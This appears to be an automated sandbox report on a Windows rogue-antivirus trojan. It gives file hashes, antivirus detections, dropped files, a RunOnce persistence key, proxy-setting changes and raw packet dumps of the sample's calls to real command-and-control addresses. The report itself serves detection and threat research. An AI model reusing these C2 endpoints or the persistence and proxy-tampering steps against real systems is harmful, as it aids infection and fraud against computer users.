Analysis Date: 2015-08-02 19:23:49
MD5: 9a6f9b60c69a3d4b1c148759b6b2297b
SHA1: e917a3cae24315240605321e476b876994d78489

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 56389db5e43e660f19198c2a9f285ae1 sha1: 3ef9be8f0a8a0c05565fe9e254f86505a858533f size: 201728
Section .rdata: md5: 1a56dbef144625aa741429f21e26a477 sha1: 9b8ebc3f1acb2d2f7e13180b0c3c53de5857be22 size: 2048
Section .data: md5: 73bbbdb16448534ef0dbfbaecddb2b24 sha1: aa806f032310e7545900be757969798599ca1162 size: 136704
Section .rsrc: md5: 6582709bb5e3792f5068614d590dc850 sha1: 984b15b6f54055831be3549b4ae9b1adba1a20ce size: 5120
Timestamp: 1970-01-11 11:10:29
PEhash: 541c4a50778bc10901e4d4af7fc71e05d392ebfc
IMPhash: 8aaaf4897d2db89e81da04378e9e697c
AV Rising: Trojan.FakeAV!49B1
AV Mcafee: Generic FakeAlert.amb
AV Avira (antivir): TR/FakeAV.btxt.7
AV Twister: Trojan.4376C03D4FA52665
AV Ad-Aware: Gen:Heur.Cridex.2
AV Alwil (avast): MalOb-FY [Cryp]
AV Eset (nod32): Win32/Kryptik.LYW
AV Grisoft (avg): FakeAlert.AAL
AV Symantec: Trojan.FakeAV!gen39
AV Fortinet: W32/FakeAlert.AMB!tr
AV BitDefender: Gen:Heur.Cridex.2
AV K7: Trojan ( 001e60c61 )
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV MalwareBytes: Rogue.SystemTool
AV Authentium: W32/FakeAlert.LY.gen!Eldorado
AV Frisk (f-prot): W32/FakeAlert.LY.gen!Eldorado
AV Ikarus: Trojan.Win32.Pakes
AV Emsisoft: Gen:Heur.Cridex.2
AV Zillya!: Trojan.FakeAV.Win32.54128
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_FAKEAV.SMID
AV CAT (quickheal): FraudTool.Security
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo
AV Padvish: no_virus
AV BullGuard: Gen:Heur.Cridex.2
AV Arcabit (arcavir): Gen:Heur.Cridex.2
AV ClamAV: Win.Trojan.Fakeav-6383
AV Dr. Web: Trojan.Fakealert.20511
AV F-Secure: Gen:Heur.Cridex.2
AV CA (E-Trust Ino): Win32/Diple.A!generic

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a360F.tmp
Creates File: C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe
Creates File: C:\e917a3cae24315240605321e476b876994d78489
Deletes File: C:\e917a3cae24315240605321e476b876994d78489
Creates Process: "C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe" "C:\malware.exe"
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aCF41.tmp"
Creates Mutex: Don't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hChElAnLfAn01805 ➝ C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805.exe\\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\All Users\Application Data\hChElAnLfAn01805\hChElAnLfAn01805
Creates Mutex: Don't stop me! I give work and money for you!
Winsock DNS: 69.50.209.245
Winsock DNS: 69.50.195.76

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aCF41.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=01805
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.76/install.php?affid=01805
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GET: http://69.50.209.245/buy.php?affid=01805&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200656A199848C614010004&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://69.50.209.245/buy.php?affid=01805&data=7F136B16D32EBE585C4D3B61159ED3A2303230323032303200656A199848C614010004&h=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.76:80
Flows TCP: 192.168.1.1:1034 ➝ 69.50.209.245:80
Flows TCP: 192.168.1.1:1035 ➝ 69.50.209.245:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 30313830 35204854 54502f31   fid=01805 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f696e 7374616c 6c2e7068   POST /install.ph
0x00000010 (00016)   703f6166 6669643d 30313830 35204854   p?affid=01805 HT
0x00000020 (00032)   54502f31 2e310d0a 52656665 7265723a   TP/1.1..Referer:
0x00000030 (00048)   20687474 703a2f2f 36392e35 302e3139    http://69.50.19
0x00000040 (00064)   352e3736 0d0a4163 63657074 3a202a2f   5.76..Accept: */
0x00000050 (00080)   2f2a0d0a 436f6e74 656e742d 54797065   /*..Content-Type
0x00000060 (00096)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x00000070 (00112)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x00000080 (00128)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x00000090 (00144)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x000000a0 (00160)   6d706174 69626c65 3b204d53 49452037   mpatible; MSIE 7
0x000000b0 (00176)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000000c0 (00192)   2e313b20 47544230 2e303b20 2e4e4554   .1; GTB0.0; .NET
0x000000d0 (00208)   20434c52 20312e31 2e343332 32290d0a    CLR 1.1.4322)..
0x000000e0 (00224)   486f7374 3a203639 2e35302e 3139352e   Host: 69.50.195.
0x000000f0 (00240)   37360d0a 436f6e74 656e742d 4c656e67   76..Content-Leng
0x00000100 (00256)   74683a20 37340d0a 436f6e6e 65637469   th: 74..Connecti
0x00000110 (00272)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000120 (00288)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000130 (00304)   6f2d6361 6368650d 0a0d0a64 6174613d   o-cache....data=
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30303635 36413139 39383438 43363134   00656A199848C614
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 31383035 26646174 613d3746   id=01805&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   36353641 31393938 34384336 31343031   656A199848C61401
0x00000060 (00096)   30303034 26683d31 20485454 502f312e   0004&h=1 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000080 (00128)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000090 (00144)   20656e2d 75730d0a 41636365 70742d45    en-us..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2036 392e3530 2e323039   .Host: 69.50.209
0x00000120 (00288)   2e323435 0d0a436f 6e6e6563 74696f6e   .245..Connection
0x00000130 (00304)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x00000140 (00320)   37463133 36423136 44333245 42453538   7F136B16D32EBE58
0x00000150 (00336)   35433444 33423631 31353945 44334132   5C4D3B61159ED3A2
0x00000160 (00352)   33303332 33303332 33303332 33303332   3032303230323032
0x00000170 (00368)   30303635 36413139 39383438 43363134   00656A199848C614
0x00000180 (00384)   30313034 31                           01041

0x00000000 (00000)   47455420 2f627579 2e706870 3f616666   GET /buy.php?aff
0x00000010 (00016)   69643d30 31383035 26646174 613d3746   id=01805&data=7F
0x00000020 (00032)   31333642 31364433 32454245 35383543   136B16D32EBE585C
0x00000030 (00048)   34443342 36313135 39454433 41323330   4D3B61159ED3A230
0x00000040 (00064)   33323330 33323330 33323330 33323030   3230323032303200
0x00000050 (00080)   36353641 31393938 34384336 31343031   656A199848C61401
0x00000060 (00096)   30303034 26683d32 20485454 502f312e   0004&h=2 HTTP/1.
0x00000070 (00112)   310d0a41 63636570 743a2069 6d616765   1..Accept: image
0x00000080 (00128)   2f676966 2c20696d 6167652f 782d7862   /gif, image/x-xb
0x00000090 (00144)   69746d61 702c2069 6d616765 2f6a7065   itmap, image/jpe
0x000000a0 (00160)   672c2069 6d616765 2f706a70 65672c20   g, image/pjpeg, 
0x000000b0 (00176)   6170706c 69636174 696f6e2f 782d7368   application/x-sh
0x000000c0 (00192)   6f636b77 6176652d 666c6173 682c202a   ockwave-flash, *
0x000000d0 (00208)   2f2a0d0a 41636365 70742d4c 616e6775   /*..Accept-Langu
0x000000e0 (00224)   6167653a 20656e2d 75730d0a 41636365   age: en-us..Acce
0x000000f0 (00240)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000100 (00256)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000110 (00272)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000120 (00288)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000130 (00304)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000140 (00320)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x00000150 (00336)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x00000160 (00352)   3237290d 0a486f73 743a2036 392e3530   27)..Host: 69.50
0x00000170 (00368)   2e323039 2e323435 0d0a436f 6e6e6563   .209.245..Connec
0x00000180 (00384)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x00000190 (00400)   0d0a0d0a                              ....
Strings